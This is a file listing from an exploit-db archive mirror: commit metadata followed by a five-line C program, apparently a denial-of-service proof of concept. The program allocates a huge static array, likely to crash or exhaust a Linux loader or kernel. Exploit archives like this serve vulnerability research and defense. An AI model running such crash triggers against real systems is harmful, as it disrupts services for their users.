exploit-db-mirror/exploits/linux/dos/10017.c
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

7 lines
No EOL
72 B
C

int main()
{
static long long a[1024 * 1024 * 20] = { 0 };
return a;
}